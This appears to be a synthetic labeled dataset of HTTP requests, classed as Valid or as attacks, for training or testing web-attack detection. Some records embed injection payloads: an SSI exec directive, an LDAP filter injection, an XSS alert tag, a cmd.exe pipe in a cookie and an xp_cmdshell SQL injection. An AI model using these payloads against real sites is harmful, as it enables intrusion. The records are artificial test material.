Date: Mon, 15 Sep 08 12:23:53 CET
ETag: W/"KujfBaJYEnNh-svZHP"
Expect: 100-continue
From: etiwhOvt@03yWr.net
If-Modified-Since: Sat, 12 Nov 05 09:35:51 GMT
If-Unmodified-Since: Mon, 04 Jul 05 10:24:39 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 26 Feb 07 11:32:01 GMT
Max-Forwards: 5554
MIME-Version: 3.1
Pragma: no-cache
Proxy-Authorization: Digest response="dD0B7d539F14ACC6a145A7c016DF9930"
Authorization: Basic ZGhBaGFpYW46RXVzb0FvZmc=
Referer: /gcNstw/edpit/ei2oee/Odd3.sh
TE: trailers,chunked;q=0.2
Trailer: Trailer
User-Agent: 5C536A http://www.forra.cz
UA-CPU: StrongARM
UA-OS: Win9x
UA-Color: color16
Via: 0.8 193.69.194.244
Transfer-Encoding: deflate
Upgrade: enw/1.2
Warning: 151 www.ttt8oAn.jpg "coIndbni" 
X-Forwarded-For: 54.46.237.13
X-Serial-Number: 2450299915461461
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

gOwEv=unpi8edjhJdtAd&euh=amdinetr&iaj0dntehdAahef=tftpdeaIIsn?&etuteutu=2033&or=neOu9ette&aRh=tincludeo2andd8eTetF&8VfziiledLthv=o2&uBQRiemINg5t=<!--#exec     cmd="/bin/ls     -l /home/dgw/Tgcaona"    -->&iIi04Ti3dTiLoys=9894&dlisseop=oC53Yig&aisR=gBn asnei39

End - Id: 39914
Start - Id: 33966
class: Valid
PUT /74Hw4Z3@p3k/7P/aieestcsln/hqdy.g_k7NbuL.SP@/t_/rinCeltlaqaote/eT/useti3giOh/6enenqozp7CirnetWt/3M@orbeN5iframe9R1/nk_YeHQqGAIMVcGR/usPJX7GuSpvN.css? HTTP/1.1
Content-Length: 325
Content-Language: ke4oHe,armol8,ahehsee
Content-Encoding: deflate
Content-Location: /rr0onua.exe
Content-MD5: bm9yZWF1bmhpaTc0cmVpbQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 21 May 09 14:03:34 CET
Last-Modified: Fri, 05 Jan 07 15:35:09 CET
Host: 173.150.13.164
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: gzip, deflate;q=0.2
Accept-Language: *;q=0.7
Cache-Control: no-cache
Client-ip: 12.246.153.214
Cookie: WgjHo=neRebHrlOl9t3k;in16a=TaMe3T8oot6eH80;e22iioEnb3ouze=62363;upnct=2699;8UiDo=am;rteo6eo=ztinntN
Cookie2: $Version="64"
Date: Sat, 29 Oct 05 14:48:25 CET
ETag: "z2-GAtrkDmrc@DF"
Expect: rkmhro=l1eel;rettlclG
From: Ueqjlnr@eeRrme.it
If-Modified-Since: Thu, 18 Nov 04 09:52:00 UTC
If-Unmodified-Since: Sat, 20 May 06 19:02:55 CET
If-Match: "B7Xbv2M0sEQAcc@"
If-None-Match: *
If-Range: "q@VttXb3bCMJ5ATso0m_"
Max-Forwards: 1489
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: Basic YXRlczo4YmN0ZWVhYQ==
Authorization: NTLM ZWp1ZXN0VGlzZDBnY2V5MGVyZWN0bWFub2RpcnVydGNvbE9vZXNoaTNld2VP
Range: 7-987,-0542
Referer: http://zstgntde.uk/neui/nhfit/Acnbc/cd3Y2Ayc/euwj.jpeg
TE: trailers
Trailer: Via
User-Agent: Mozilla/2.9 (X11; U; Linux i586 9.9; Se-bn; rv:7.3.0) Gecko/69932600
UA-CPU: x86
UA-Disp: 225,357,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 5321x9359
Via: 9.1 www.mdaee4hq.png:6
Transfer-Encoding: compress
Upgrade: ats/6.8, zai/9.1, pj4sli/5.2
Warning: 479 www.rirnPoa.css "MEsa0n6shefloReoC5" 
X-Forwarded-For: 48.2.222.131
X-Serial-Number: 33226
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

rngneFl0iahs=f1viHjlWqMyH&NmtoGstf=noaxiaiaftelOiuudi&DXI@HY=window.openanden&4PtaJA9LTSwp-=tEaentnnXowecr&rsilnI=8&hmot=iAetG@sz&LxtermFo8=005065&Eaevmtu6fes=R3Co&OIrHMZ=rcpaoax&ncen=hn8ldIplrri1i&eareHteoaHylk=dw ?i&7LH-UoNsock_stream4X@=oeeawEsan1ui3Free&snNiurf4=aSy&tivo7Os=Dse2<otette<&u6GNtiazeu=o3Ntetel5lssje

End - Id: 33966
Start - Id: 37855
class: LdapInjection
GET /t-6TaTKWa/dvVv9t1Vkx/Eg0inp.jsp?clagTeimyrl=o8%40nqq3%40JV&inae=heDUuwE5iQV&rn8rttesZh4=eval&hytcbmeuoootd=erprocessing-instructionservices%25+eensnf&Ln34diush=7240725&MQwoZTQ8.=%29++++%28+%7C%28+++cn%3D*o++++%27brien*++%29%28mail++++%3D*o+%27brien*%29++&1ech=6nanthg%2Bmobject7%40d%7Ce&BItp1NCZhXw=9452&hC.P=scOA HTTP/1.1
Host: www.dneReson.st:3
Connection: keep-alive
Accept: application/*, text/*, image/png;q=0.2
Accept-Charset: iso-8859-9;q=0.6
Accept-Encoding: gzip, gzip;q=0.4, deflate
Accept-Language: rr7heiN-lieee;q=0.7, wro-t;q=0.5, 8-eFn;q=0.4, xyo-7srpdyT, tiuut-eHsei
Cache-Control: S='4uo85eT'
Client-ip: 177.246.9.242
Cookie: thusritt=objectilicaetc+h;7sp=48
Cookie2: $Version="737"
Date: Sat, 01 Dec 07 15:55:30 CET
ETag: W/"dTRQrj2K5e8uW80E"
Expect: ealdo
From: dxmog@eeOtwtfr.com
If-Modified-Since: Thu, 25 Mar 04 18:39:44 GMT
If-Unmodified-Since: Sat, 08 Sep 07 23:54:50 UTC
If-Match: "yiSLxYUgGsv-ITzW"
If-None-Match: *
If-Range: "g.eXlvzwong6b-P_NM"
Max-Forwards: 135
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Digest username="otjbsa"
Authorization: shsawf 9kNre=eHyvsun6
Range: 853418-,-430
Referer: /hus2nhl/adOd/eAIuzmcs.js
TE: trailers
Trailer: Referer
User-Agent: Mozilla/2.7 (X11; U; SunOS sun4u 2.6; h2-ue; rv:6.9.5) Gecko/51326256
UA-CPU: x86
UA-Disp: 8628,0806,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 2946x657
Via: FTP/8.5 www.tififilr.shtml
Transfer-Encoding: identity
Upgrade: uoE/5.1, iitjl/6.0
Warning: 340 www.t8Tb0.gif "i52D9owoehei2ibsei" "Thu, 30 Dec 04 01:19:45 CET"
X-Forwarded-For: 109.105.145.129
X-Serial-Number: 300384
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 37855
Start - Id: 8034
class: Valid
POST /5ntoTidnbezghse.asp? HTTP/1.0
Content-Length: 197
Content-Language: h8
Content-Encoding: gzip
Content-Location: http://www.z9Oew6t9.org/eq9xg.gif
Content-MD5: eTNyN2dlbnN0YXFldXIyaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 24 Apr 07 03:42:26 UTC
Last-Modified: Mon, 01 Oct 07 22:28:16 CET
Host: www.etorsey.net
Connection: close
Accept: application/*;q=0.9
Accept-Charset: *;q=0.7
Accept-Encoding: gzip;q=0.2, compress, gzip;q=0.4
Accept-Language: *;q=0.7
Cache-Control: min-fresh=7
Client-ip: 208.215.235.51
Cookie: ntw0okoebklt8b=ja;028M32=25;ftpaxp1EF1K=processing-instructioneSs;edEhOc=5000;boH0tyeptrldmk=qhiedseoaaest6
Cookie2: $Version="80"
Date: Thu, 14 Oct 04 02:50:51 CET
ETag: "-LL_O7KhyDc9dcuXdc"
Expect: storrieg
From: eceaIe@alofoT.net
If-Modified-Since: Sat, 19 Mar 05 21:47:04 UTC
If-Unmodified-Since: Wed, 17 Oct 07 10:28:53 CET
If-Match: "4dEK3fpdBoxN_sJJ"
If-None-Match: *
If-Range: Sun, 11 Mar 07 14:21:16 UTC
Max-Forwards: 9184
MIME-Version: 6.1
Pragma: EOf=eoa
Proxy-Authorization: NTLM dGJ0dHd1b1RvYW1pZmhsOWN5RW13bWRpZWI4YXN1M29v
Authorization: Digest algorithm=qyit
Range: 242584-128530,-8535
Referer: /lzNzr0T/sod4c/timmioH/QcewLE8.htm
TE: chunked
Trailer: Accept-Language
User-Agent: Mozilla/4.8 (Windows; U; WinNT 2.1; xr-iy; rv:9.9.2) Gecko/74088722
UA-CPU: x86
UA-Disp: 5540,780,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 925x186
Via: HTTP/1.5 91.227.10.45:50
Transfer-Encoding: compress
Upgrade: tOtx/4.6, hie/5.3
Warning: 857 www.henerslc.css "Rneud" 
X-Forwarded-For: 243.241.144.79
X-Serial-Number: 8061292856047
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~

m79b4eesT8es=oirpswfa<6&zo7=emtG7CNW&961XInJ5Eg-m=039607&ererekNcoAha=20&nh=h18SM7ca1-J&gmrpierefaerSi=Tt>n9h&nble&oth=5436633856&SFftuinfWhesyM=rzihtda&re=t?tygroup by&hniriit5Ns=(rasetc

End - Id: 8034
Start - Id: 47507
class: XSS
GET /s5aaegu/e5rDbnse/09im.bin?3omlTEo=1osi%3Fi&H2cxo2Iodn1nate=er%3Ba&ewoc=Whe&uivsDcQ4iomE=8&i9rvspli=9444431&usrewiowi=stauf+bwhngcr&Proma=kdh9Dntl&0eel4nn1ei=%3Cimg+src%3D%26%7B%5Balert++%28%27gof%27%29%3B%5D%7D%3B+++%3E HTTP/1.0
Host: 165.150.229.46:996
Connection: close
Accept: application/*;q=0.9
Accept-Charset: iso-8859-5;q=0.0, iso-8859-4;q=0.5, x-mac-ce;q=0.1
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: max-stale
Client-ip: 121.61.23.210
Cookie: wbasrnTjea=nqo;oRoostsuasrfo=rcpawhere;jel3yamy8t3n=t deletehe2e'tilrjkwhere;teC0ea3EnS=eetodeood0tixaon;nrnwfltt6st=968;hOti8e2sneida=0
Cookie2: $Version="817"
Date: Thu, 01 Sep 05 12:46:12 CET
ETag: "qmDTtpLzCe8qlwiktv"
Expect: narz
From: oEh7ee@n2lwamdun.biz
If-Modified-Since: Tue, 13 Dec 05 24:09:39 CET
If-Unmodified-Since: Mon, 27 Jul 09 13:05:34 UTC
If-Match: "GFAfeUfcH9WAiYq"
If-None-Match: "psPV2ruvNNT45x2-w"
If-Range: Sat, 02 Dec 06 11:22:49 GMT
Max-Forwards: 3
MIME-Version: 9.4
Pragma: eE=eo
Proxy-Authorization: Digest algorithm=MD5
Authorization: Basic bHQ5YXR4RW46YXMxdA==
Range: -582231
Referer: /emsiih4e/ag1rfct/2t6Z4osn/rganEo.mdb
TE: chunked
Trailer: Authorization
User-Agent: eYpfdYtlns
UA-CPU: PowerPC
UA-Disp: 076,499,32
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 7841x155
Via: 0.9 www.i2ttemW.css, 8.3 www.tddfonGe.jpg
Transfer-Encoding: compress
Upgrade: atsa/8.3
Warning: 840 www.salomt.jpg "rNd8aaEbphDe" "Fri, 08 Sep 06 13:06:00 GMT"
X-Forwarded-For: 128.172.113.199
X-Serial-Number: 870651819
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 47507
Start - Id: 30158
class: Valid
GET /gohe7882/FL9Rjz.png?Ednaz=0&GemLkx6m=t._OM1FmQ1&.eNuQtqXscriptu=dl4 HTTP/1.1
Host: 162.191.44.213
Connection: close
Accept: video/quicktime;q=0.6
Accept-Charset: iso-8859-8-i;q=0.9, iso-8859-7, windows-1253, iso-8859-4;q=0.7, x-mac-greek
Accept-Encoding: *;q=0.5
Accept-Language: l8l-loerXed;q=0.1, enbdc-rc;q=0.2, ieoea-s4Wtf
Cache-Control: min-fresh=83
Client-ip: 70.123.209.51
Cookie: cpre=uniontaepr;sienrDosn0st=9;ohAighoivsstlI=het~eptahe
Cookie2: $Version="0"
Date: Sun, 18 Jul 04 14:50:25 UTC
ETag: "4dm4BGB5gohciP@dd6a"
Expect: 100-continue
From: heOsedeo@tympyx.fr
If-Modified-Since: Thu, 03 May 07 21:18:08 UTC
If-Unmodified-Since: Thu, 11 Feb 10 24:23:54 GMT
If-Match: *
If-None-Match: *
If-Range: "3OoicjSUt7sXG6KGEd"
Max-Forwards: 1
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: NTLM aG56NGV3c05md2l0M2VlbjdhdXNzZTIwZnVsbGVlcG9lNW9TaWVkaXRnbGRyZw==
Authorization: NTLM amNORGFsaXREbmUzaWVjcTRpc3JubWFyc2liRGR0OGV1aFVpZUVoRzBVRWViZQ==
Range: -1
Referer: http://www.neg1yhn.ch/ri7Ws/dNfyjmTe/vuoh8hji.htm
TE: gzip,gzip
Trailer: Upgrade
User-Agent: iuRTieiue
UA-CPU: Sparc
UA-Disp: 9773,678,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 488x0113
Via: 2.0 www.tteait.tiff:44678
Transfer-Encoding: compress
Upgrade: nai/6.7, r2smqp/5.1
Warning: 169 145.87.255.238 "bhcawmncs4" "Fri, 12 Jan 07 03:02:59 UTC"
X-Forwarded-For: 46.52.217.2
X-Serial-Number: 7148566878920478755
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30158
Start - Id: 1155
class: Valid
GET /nEkAf1WhrE0xnm/ovCwOUW1MBq1X.cWFMaE/ZOAzB7VTpjC/3lYoftPbxaotmotein/6tsyiieHA0dctEuojac/m8el7XeirijndogeEilj/ebL3S5.SwqhQU8he6J/emFtmoW8262VZJromaN/i6a.fSbrUcZylHTd_x3/tFmDQBYSSYSVVxt/ovS/unG.css?etsirtxSriEuy=23429&eaticeeelienE=dE%5Ce&otsphwez4p4=%5DcseosRi+tpip+includera%3F&6autycjln=iae4input&2evfdc8helIA2nb=8ere%3Dr%2BffnuilF&eehh3fiie9=27311&t1kdle9vam=08005062&uwFMdlK8=1559260&uD12baM_=a%3B%2F&6o=43610&ubhRtgtel=oar&eaec5Ndxeootii=oou6mPniEos%3Deni&nlesbej=6o%25e6rwfusrl HTTP/1.0
Host: www.2qhf3uarhx.de
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: U-dde, lbaNes-u89pTm;q=0.6, a-uudcznee;q=0.0, n-jnet;q=0.1, tp-aoi7
Cache-Control: max-age=023
Client-ip: 87.132.125.217
Cookie: feAnsad=7unketjTh;8llwgf4=zirzianirxaannrsmr;ldwho=t__;shnxxsoonhu=0562;unsqyauA=5754
Cookie2: $Version="57"
Date: Thu, 31 May 07 10:03:03 GMT
ETag: "gTFHsmVKl7Dq-Mld"
Expect: r1xhc9ql
From: is2pl@e3nrm.st
If-Modified-Since: Tue, 17 Mar 09 05:36:13 CET
If-Unmodified-Since: Mon, 01 Mar 04 21:09:13 CET
If-Match: "XK6qZHC@vD4d81uJ-tk"
If-None-Match: *
If-Range: *
Max-Forwards: 055
MIME-Version: 3.0
Pragma: oj2igsae='g'
Proxy-Authorization: Basic aWlkeTJ0ZXM6bmVpdDd5SQ==
Authorization: Digest uri=/ator/cop0ao.aspx
Range: 6-,-2722
Referer: /aoisil/RTestif2/arigtswo/Hl9vc.php4
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/3.7 (Machintosh; U; Mac OS X 7.0; nh-sv; rv:7.7.4) Gecko/86016481
UA-CPU: x86
UA-Disp: 111,7924,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 597x246
Via: 0.8 www.hwrejh.jpg, FTP/2.3 88.29.187.181, 9.7 www.Hsdtg.png
Transfer-Encoding: gzip
Upgrade: stc7/1.6
Warning: 977 184.2.254.69 "AKeetsfonarsxee7ilss" 
X-Forwarded-For: 174.219.186.109
X-Serial-Number: 82528622
----: ------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 1155
Start - Id: 24428
class: Valid
GET /c@Nr/hrsntkgyneo6satuiori/jtsemmriehgj.php?itr=252&hoi=9TJ&oaot=68849&wqlN4J31ZWIx=2178687&t8childUEFidsBM=yt%7C&Aw2oMFIwwlX=d.qqbkFinKH HTTP/1.1
Host: 186.246.180.10:71135
Connection: synlir
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.0
Cache-Control: max-stale=6250
Client-ip: 23.19.182.244
Cookie: aicHnhs8lcbOos=e7T;hrpcaomc=otrebgsoundu av0drmxpassthrum
Cookie2: $Version="853"
Date: Fri, 09 Jun 06 03:09:11 GMT
ETag: "LR@l_IuJzh-f9HJ"
Expect: h6ascOr
From: tetatv@lisp.com
If-Modified-Since: Wed, 08 Apr 09 14:05:55 UTC
If-Unmodified-Since: Sun, 24 Feb 08 21:19:11 UTC
If-Match: "KGUn4IJAmM58W5P"
If-None-Match: "4zcx1@RUb7OTt7ft0h8B"
If-Range: *
Max-Forwards: 03
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: trHksd ftbdaee=elEtN
Authorization: zsml ebrsl=uoywwb
Range: -78
Referer: /ewh34/tdqc.mspx
TE: trailers,deflate;q=0.4,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/6.7 (compatible; Konqueror/4.9; Solaris; rcfavttt; SueasnnS; Mdxupawn)
UA-CPU: StrongARM
UA-Disp: 705,814,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 179x8444
Via: oyoe1e/6.3 www.anhnt.jpg, 2.9 198.89.191.241
Transfer-Encoding: compress
Upgrade: I3r8es/8.7
Warning: 384 232.82.13.199:64408 "wtsat5ea1fS" "Fri, 28 May 04 19:43:14 CET"
X-Forwarded-For: 186.89.49.199
X-Serial-Number: 782387
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24428
Start - Id: 20440
class: Valid
GET /aOsloq3H7fHlLL1dM/qostremMcoeeasilcoaO/lsoi7sdrh5lt8e/x6MM/eAkdYxb2lcceP/a_.gif? HTTP/1.1
Host: 163.10.167.253
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: deflate;q=0.7, deflate;q=0.2
Accept-Language: 5ewq8h-tieal, di-lSeZs, a-notE;q=0.5, Prfi5tn-gs8c, e-trlct;q=0.4
Cache-Control: no-cache
Client-ip: 202.176.144.141
Cookie: A-TusrUg=isegsfh;the7=reheEh
Cookie2: $Version="6"
Date: Mon, 22 May 06 07:46:17 UTC
ETag: W/"J5a8UxTuwAtRopVlERn"
Expect: 100-continue
From: baet0r@XRdlittsO.fr
If-Modified-Since: Thu, 28 Feb 08 21:59:31 GMT
If-Unmodified-Since: Fri, 28 Apr 06 23:26:01 CET
If-Match: *
If-None-Match: "2hQd.SWSqlMYVgv8HnO"
If-Range: Mon, 20 Nov 06 06:38:48 CET
Max-Forwards: 12
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM c3ViT1dlc29nYzZleWdvQWhob3RldGl0Y29vcjVnbGpB
Range: -896,61-724379,-171
Referer: /ate1i.avi
TE: chunked
Trailer: Authorization
User-Agent: Mozilla/5.3 (Windows; U; Windows NT 0.5; fs-tM; rv:7.6.0) Gecko/03289849
UA-CPU: 68000
UA-Disp: 903,743,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 8091x908
Via: 3.7 161.84.83.201:464
Transfer-Encoding: o91E; riawi=aKeeuaeb
Upgrade: 40r/4.7, mrf/3.7
Warning: 507 147.216.24.122 "tsXo1ea" "Wed, 04 Jun 08 11:36:12 UTC"
X-Forwarded-For: 92.6.156.80
X-Serial-Number: 36796003300
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20440
Start - Id: 30890
class: Valid
GET /up0effvecosao/bJM.mspx? HTTP/1.0
Host: www.utiispucr.com
Connection: moiteus
Accept: application/*
Accept-Charset: iso-8859-8, euc-cn
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 17.214.18.38
Cookie: tetmhhaae=IkiJ%;erm1phfenoa4ir=5708283
Cookie2: $Version="2"
Date: Thu, 27 Jan 05 24:20:48 GMT
ETag: W/"rQPx.FZ4dJp280hlby"
Expect: 100-continue
From: amHxrsrn@9as8ijaavb.it
If-Modified-Since: Thu, 10 Jan 08 09:19:35 GMT
If-Unmodified-Since: Fri, 05 Jan 07 10:40:46 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 10 Nov 07 05:45:05 UTC
Max-Forwards: 736
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: ihtSuR 1erotrKa=8edlbrl
Authorization: Digest nonce
Range: 8-
Referer: /nrdndrn/tvak.php
TE: gzip,chunked;q=0.9,chunked
Trailer: Host
User-Agent: Mozilla/3.4 (Machintosh; U; Mac OS X 0.7; ba-ah; rv:7.5.6) Gecko/45248692
UA-CPU: MIPS
UA-Disp: 830,625,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 572x8066
Via: 0.5 www.gan3jn.js
Transfer-Encoding: compress
Upgrade: spiie/8.9, apg2sc/2.7, exuI/4.7, ndd/9.7, fnvse/6.9
Warning: 189 www.mlol.css "aohnMtaeseT4szte" 
X-Forwarded-For: 27.200.216.45
X-Serial-Number: 0719551808086
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30890
Start - Id: 36643
class: OsCommanding
GET /ttgftfenRs7/lrWWWKIj4@qBck/aaoue/tetomuque7s0atwi/x8gg7ODy_/eae3audf/wscg6gIw/SmDu-m.g745exec/tIy.nsf?orrETgu7dmsalt=nFLvsblQSo&nhabotji=bangas2p&iio=l&r7rourio=484418152&tHisd3n=toa-GeL9JfQ&rcaqcohaenis1th=72247072&azmaobwteitHsec=0561 HTTP/1.1
Host: www.9aNd.net
Connection: keep-alive
Accept: text/*, audio/*
Accept-Charset: *;q=0.6
Accept-Encoding: compress, compress;q=0.3, identity;q=0.4
Accept-Language: *;q=0.3
Cache-Control: s=ihqk0e
Cookie: 1tmtthtra=621;autoexec27-iconnectO=ttAZHZ.;rzeaiasOi=hpEc4-?tsege;v-Xrmbk9IQEA=173.20.48.183   | cmd.exe /s;tichfutjemgt5=ss6e
Cookie2: $Version="06"
Max-Forwards: 45
Pragma: ar9s5sm=magee2
Authorization: NTLM eGVyZ3NzYWFhZWhJZGh3ZmVpZWE4dHZuc3RrbHd1bmV0ZXVz
Referer: http://www.satsen.fr/euneh/jdeeorhb/lfeonUrs/feiioro/lr1N1.jpg
User-Agent: hgyrl5xhcM (e.TXlEVakL)

null

End - Id: 36643
Start - Id: 32340
class: Valid
GET /iCiCmv008qnMnJ39SX/wA/q.ZgAEpkhtpassC/QlhttpsX@g/tehee7ay6i2ox2/aHhHT4dBSaLRuZo/eiEnCns1uHnztalraat.asp?tvms2tA=o2h&qQnph-tSDH=5541&KIHv_BW=ee2&ooeodteo=co%2Bphpe&eWXAnRperlOo=rI%24yi&qIarsrnoEiohy=b73D_8q&3ucG=947&sam4CrtFf40qU=htSPkusd-aro+eg&hjtdnHhiyatnA=h%40ttnkhobjectdps8wget&cnop6wa4edk=fbeWcrciicRnn&sjhs7srteZihoIs=taPmuba%40RD&ot=3575&rsaPhon2Tn=e3l7sGwMp.&h7vxcntd=eIGiQ HTTP/1.1
Host: www.Qrppssne5.gov
Connection: keep-alive
Accept: application/*;q=0.6, text/html, application/*
Accept-Charset: x-mac-chinesetrad;q=0.9, iso-8859-3;q=0.0, x-mac-chinesetrad;q=0.3, iso-2022-jp, cp-950
Accept-Encoding: compress, gzip
Accept-Language: 74uol-Ae5nrbe;q=0.1, rerz-uh;q=0.3, ut2h-pTne;q=0.3
Cache-Control: no-store
Client-ip: 184.137.255.50
Cookie: ois=ofIWSlSwbxb;ye8inetts=38;SyaA=8moenrv3auaostf3s
Cookie2: $Version="91"
Date: Wed, 12 Oct 05 16:55:41 GMT
ETag: "7wBQ58KJo_lePfJqRvb"
Expect: 100-continue
From: E8ie@bbNE.biz
If-Modified-Since: Wed, 09 Jun 04 07:57:41 UTC
If-Unmodified-Since: Mon, 07 Jun 04 14:20:28 GMT
If-Match: "rWIR_9YjajiyrWhz5VA"
If-None-Match: "mMitNRp3Pz237K5"
If-Range: Fri, 22 May 09 11:12:23 CET
Max-Forwards: 7
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: Basic TjBsMjJlOklhc21oc3V3
Authorization: NTLM ejl0cjZ5bXRsU25zOHRoallwb24xZW5hcWhuaDFtbGV1ZmIyaW5lYWVzSUloSG4=
Range: -604
Referer: /eeaaniee/aclep/ifwt.jsp
TE: deflate,gzip
Trailer: Via
User-Agent: 4zg0SGaZmj http://www.sbog.fr
UA-CPU: Sparc
UA-Disp: 7110,163,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 831x847
Via: FTP/3.1 www.srnTnuaB.js, 9.1 www.arcotado.shtml
Transfer-Encoding: gzip
Upgrade: eai0N0/8.3
Warning: 268 73.155.225.55 "tujat7tN1dsia" "Fri, 08 Oct 04 18:08:34 CET"
X-Forwarded-For: 132.144.23.218
X-Serial-Number: 5125463883
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32340
Start - Id: 41041
class: SqlInjection
GET /ineiyeld/m0/oCDMGd6V9vs/bRbwy/sEfc0ld0PWZsJAV0.jpeg?oS6qba664i=exec+++xp_cmdshell+%27%2288lln1e%22++%3E%3E++++script.vbs%27&cx6arlhrae=85767810&dosnmrhaoXem=srk&atidfuv0aPLN=laoDR.MeZ8&a4r=copyt&suin3etogmJ2pny=39098611&O7Taccept=rTryagdcxdgs&7fD.QX-=68200630&cejmser=709728502&mirvtati=ntteeubodyh HTTP/1.1
Host: 131.233.117.213
Connection: keep-alive
Accept: image/gif;q=0.0
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: rW-t;q=0.3, 6uPdwx-c6
Cache-Control: no-transform
Client-ip: 228.241.241.37
Cookie: cron=/a wlIactrobai;tqsnnr=sKXKISCYdWvv;agnrg=s0;kwyeuqfoge=reMT_le;ihHpe=e
Cookie2: $Version="1"
Date: Wed, 25 Feb 04 08:12:04 GMT
ETag: W/"_WrR1Ly1ZlOqxyWv2v9n"
Expect: 100-continue
From: i4axWsi@dEthgse.cz
If-Modified-Since: Sun, 21 Dec 08 20:35:04 UTC
If-Unmodified-Since: Wed, 21 May 08 16:16:52 CET
If-Match: "dxumfr_nVajMqRv1"
If-None-Match: "RpkovYZmfpWLjLn"
If-Range: "zRu2NRpV9XxMIV6l6ykf"
Max-Forwards: 44
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: dEwdh oSgoauto=ctAcmei
Authorization: Basic OGZidGM1cXo6bFRzcUE0dA==
Range: 7-04,570-
Referer: /sAtala/uEeero/8ceae.swf
TE: deflate;q=0.8
User-Agent: Ouha (mF_pHJVa; irXLWvgdLx)
UA-CPU: PowerPC
UA-Disp: 3796,7783,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 381x817
Via: 8.6 188.137.176.139, FTP/2.1 153.226.221.165:3051
Transfer-Encoding: deflate
Upgrade: mme/2.4, 09a/7.3, yAr/5.1, ihhdl/6.4
Warning: 886 225.6.48.99 "n1xne5msKpismeoarx" 
X-Forwarded-For: 57.95.233.202
X-Serial-Number: 54708069609443708
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 41041
Start - Id: 33153
class: Valid
POST /lq28DK3sYby/hmPp7Us.jKuO/cb/Ezyv/a4dt7mhAse8f3/lO06xkQWORSeJ/OPdsdnyra9.css? HTTP/1.0
Content-Length: 46
Content-Language: ct,sI,r
Content-Encoding: identity
Content-Location: /loAee/t3tmn/rutknsv.wav
Content-MD5: ZDBvaWFEZU5mbm9sY2w1VA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 22 Jul 05 06:36:25 GMT
Last-Modified: Mon, 16 Jun 08 19:24:02 GMT
Host: 195.106.99.138:80
Connection: close
Accept: application/zip, text/*;q=0.1
Accept-Charset: *;q=0.7
Accept-Encoding: deflate, deflate;q=0.5, identity;q=0.1
Accept-Language: *
Cache-Control: max-age=98331
Client-ip: 118.72.120.102
Cookie: KDxD5QQItmpmna=08949;gxtgno=y\c
Cookie2: $Version="14"
Date: Thu, 01 Mar 07 13:15:16 CET
ETag: "vYqCg6krYQGgc4Tws38"
Expect: 100-continue
From: ntsrj@mDKe5itb.net
If-Modified-Since: Sat, 25 Sep 04 24:30:25 GMT
If-Unmodified-Since: Tue, 16 Dec 08 02:23:22 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 14 Sep 06 24:22:55 UTC
Max-Forwards: 0611
MIME-Version: 2.2
Pragma: 9btrhbsh='gearbeE'
Proxy-Authorization: Basic MWxlbTpkdm9T
Authorization: ea2omu teZoSENi=rizrc
Range: 2283-08,769-296466,942-
Referer: http://www.nbeap.ch/tvete3ie/nlhTTp.pdf
TE: chunked,trailers,chunked;q=0.0
Trailer: Authorization
User-Agent: Mozilla/0.1 (Machintosh; U; PPC Mac OS X 5.1; tc-tt; rv:1.3.1) Gecko/90014853
UA-CPU: x86
UA-Disp: 460,8217,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 492x1700
Via: xtf/6.4 80.60.221.30:8486, 8.5 www.iEtir.js:80667
Transfer-Encoding: compress
Upgrade: lrh/0.7, ai4/1.8, kcj2NT/4.6
Warning: 563 www.ssegmi.jpg:0959 "eA0hiutfptspi" 
